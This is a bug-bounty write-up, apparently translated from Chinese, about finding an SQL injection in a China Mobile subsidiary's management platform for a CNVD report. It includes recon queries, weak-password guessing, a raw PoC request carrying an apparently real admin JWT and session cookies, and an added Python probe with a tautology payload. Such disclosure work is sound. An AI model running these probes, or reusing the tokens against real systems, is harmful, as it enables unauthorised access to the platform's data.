This article is for technical discussion and learning only. Any direct or indirect consequences or losses caused by using the information or tools it provides are the sole responsibility of the user; the author accepts no liability.
SQL injection in a China Mobile event-type vulnerability

Preface: the conditions for a CNVD event-type vulnerability certificate are the three major carriers and the xx Ministry.

Feel free to share more approaches with me.

Use Aiqicha to find the assets of wholly-owned subsidiaries; prioritise companies that are 100% held by the parent.

[screenshot: image-20231107144456276]

[screenshot: image-20231107144500222]

Earlier I used Hunter with icp.name to find ICP-registered assets; I went through them one by one, combining icp.name with web.title and web.body, to look for weak points.

I was lucky enough to find this platform. For a back-end login page like this, look through its JS files and try the handful of common weak passwords; if that fails, move on to the next target.

[screenshot: image-20231107145238379]

I tested the search function here: no SQL injection. Keep looking.

[screenshot: image-20231107145307677]

[screenshot: image-20231107145401460]

At this point it is a different interface altogether: there are a great many function points and a great many requests being loaded, so here you need to pay attention to the request history in Burp.

[screenshot: image-20231107151119187]

[screenshot: image-20231107151138356]

In the History tab I found some requests carrying parameters and tried injection on them; roughly speaking, this is the request that decided whether injection existed.

A single quote ' produced an error, while two single quotes '' returned normally. That pair is the classic sign that the input is being concatenated into a single-quoted SQL string literal: the lone quote leaves the literal unterminated and breaks the statement, whereas '' is a valid escaped quote inside the literal, so the query stays syntactically correct.
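The ' versus '' check described above, reproduced against a constructed in-memory SQLite table (added example, not code from the original post or from the target application; the table, column names and handler functions are assumptions chosen to mirror the deviceKey parameter in the PoC request):

```python
import sqlite3

# Constructed sample data; not the target system's data.
ROWS = [
    ("111", "electricityDevice", "meter-A"),
    ("222", "electricityDevice", "meter-B"),
]


def make_db():
    """Build an in-memory table shaped like the assumed gather_real query target."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE gather_real (device_key TEXT, device_type TEXT, meter_name TEXT)"
    )
    conn.executemany("INSERT INTO gather_real VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_list(conn, device_key):
    """Assumed vulnerable handler: concatenates the parameter into the SQL text.

    This is the pattern the ' / '' test detects: a single quote terminates the
    string literal early, two quotes are an escaped quote and stay valid.
    """
    sql = "SELECT meter_name FROM gather_real WHERE device_key = '" + device_key + "'"
    return [row[0] for row in conn.execute(sql)]


def fixed_list(conn, device_key):
    """Hardened handler: bound parameter, so quotes are data, not SQL grammar."""
    sql = "SELECT meter_name FROM gather_real WHERE device_key = ?"
    return [row[0] for row in conn.execute(sql, (device_key,))]


def probe(handler, conn, base="111"):
    """Send the two probes and report ('error'|'ok') for ' and '' respectively."""
    outcome = []
    for suffix in ("'", "''"):
        try:
            handler(conn, base + suffix)
            outcome.append("ok")
        except sqlite3.OperationalError:
            outcome.append("error")
    return tuple(outcome)


def looks_injectable(handler, conn):
    """The page's rule: ' errors and '' is fine means a string-context injection point."""
    return probe(handler, conn) == ("error", "ok")


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(vulnerable_list, db), looks_injectable(vulnerable_list, db))
    print("fixed:     ", probe(fixed_list, db), looks_injectable(fixed_list, db))
    # A tautology payload returns every row from the vulnerable handler only.
    print(vulnerable_list(db, "111' OR '1'='1"), fixed_list(db, "111' OR '1'='1"))
```

The same two-probe logic applies to the live request: replay the PoC with deviceKey=111' and deviceKey=111'' and compare the responses; a server error or changed page on the first and a normal response on the second is the signal to hand the request to a full tool such as sqlmap. Note that the heuristic only detects quoted-string contexts; numeric contexts need a different pair (for example 111 and 111-0).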

PoC:

```http
GET /api/gatherReal/gatherRealList?areaId=&deviceKey=111&deviceType=electricityDevice&pageNum=1&pageSize=15&relation=tusrMeter&meterName= HTTP/1.1
Host: 
X-Requested-With: XMLHttpRequest
projectid: 3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
token: eyJraWQiOiIxNjc5NDcwNzE2OTMyIiwiYWxnIjoiUlMyNTYifQ.eyJpc3MiOiJFYXN0U29mdCIsImF1ZCI6ImFwaWNsaWVudCIsImV4cCI6MTY4MDAyOTAwNiwianRpIjoiMVpsMDhSN0ZVeTlsOEhuWEdILWdrQSIsImlhdCI6MTY3OTk4NTgwNiwibmJmIjoxNjc5OTg1NzQ2LCJzdWIiOiJhZG1pbiJ9.WDwgIj3MImJUa9k74c1AWESig-nd9YKgWJ1wpSAzPu8E9Rjqf955vPayU2SDFXyxQ1ZbNxl0kE5xXxH4tLII-gmW91GG-c0fhZTN9gSNm-A_b1q4YF0dI_nQ5FggLh3FA7ScwLmqswZZvE-QiWzdVc5v4tJk7wdL4G1piPSh3JZSGePXqlntj_Gi8ieQJ3eHC0ldH44liEFdXyylHyuoN1D9HLaNZ0-oknS0f_f8GmhSZcliATdCn6fFZoTost-DcuJeVtUHMRYeHBOR6BfOziTStlODpfRHw2s8EAuboFQ947jGVA9wD2Taj5L4wrkqHs-ppK8b_4yUcvI8EWTlcw
need: true
Accept: */*
Referer: 
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SSLVPN_lang=1; JSESSIONID=CE3F0BD4E98448D4F1AD9DAFF9DA67BF; auth=pass; auth.sig=v24qOahT2-6MCaXtPRgcq8U6uE0; koa.sid=NWfL0bvR_v-k2_ilrWheD2bjjkk-7Fp2; koa.sid.sig=deK65VI6T2MvnFMM6xylFjZGlhE; SECKEY_ABVK=HMdrs/iY0WWgSsNX7n9rHX6jkKAT3wNhePHxh+Vvgs0%3D; BMAP_SECKEY=gT0nwSJSicq2NofEyWeK39ytozFI_B_bluXoWC_P3db44tw7lC5e5xf7bluw9z760LgU8SyktVJma6pjpO0kQrnYjmsiED2mPy64rR95EIlC12RTQVDkC8ABA6d1QboPPyw2xasfMeQakMAnf1jvu5C_2inbLTlxD2y5BLQYAEH3mfENoVR-pkg75q07Pnvw; permission=eyJraWQiOiIxNjc5NDcwNzE2OTMyIiwiYWxnIjoiUlMyNTYifQ.eyJpc3MiOiJFYXN0U29mdCIsImF1ZCI6ImFwaWNsaWVudCIsImV4cCI6MTY4MDAyOTAwNiwianRpIjoiMVpsMDhSN0ZVeTlsOEhuWEdILWdrQSIsImlhdCI6MTY3OTk4NTgwNiwibmJmIjoxNjc5OTg1NzQ2LCJzdWIiOiJhZG1pbiJ9.WDwgIj3MImJUa9k74c1AWESig-nd9YKgWJ1wpSAzPu8E9Rjqf955vPayU2SDFXyxQ1ZbNxl0kE5xXxH4tLII-gmW91GG-c0fhZTN9gSNm-A_b1q4YF0dI_nQ5FggLh3FA7ScwLmqswZZvE-QiWzdVc5v4tJk7wdL4G1piPSh3JZSGePXqlntj_Gi8ieQJ3eHC0ldH44liEFdXyylHyuoN1D9HLaNZ0-oknS0f_f8GmhSZcliATdCn6fFZoTost-DcuJeVtUHMRYeHBOR6BfOziTStlODpfRHw2s8EAuboFQ947jGVA9wD2Taj5L4wrkqHs-ppK8b_4yUcvI8EWTlcw; permission.sig=ijnuqDFf-k-OoJhYN01W3HKsiVg; skin=%22skin-blue%22
Connection: close
```

[screenshot: image-20231107151401045]

[screenshot: image-20231107151427385]

Hunter query used to look for further instances of the same platform (web.body="管理平台" matches pages whose body contains "management platform"):

icp.name=""&&web.body="管理平台"

[screenshot: image-20231107150306818]

Afterwards I submitted it to CNVD and found it had already been reported, and recently at that. Not willing to let it go, I decided to dig for a generic (product-level) vulnerability instead.

[screenshot: image-20231107150349473]

At first I could not find a key identifying field and could not tell which company had developed the system. I asked K-shen, who identified it from the logo on the site's home page: a vendor with registered capital above 50 million, for which a medium- or high-severity finding is enough, and that led to the three later universal (all-instance) vulnerabilities.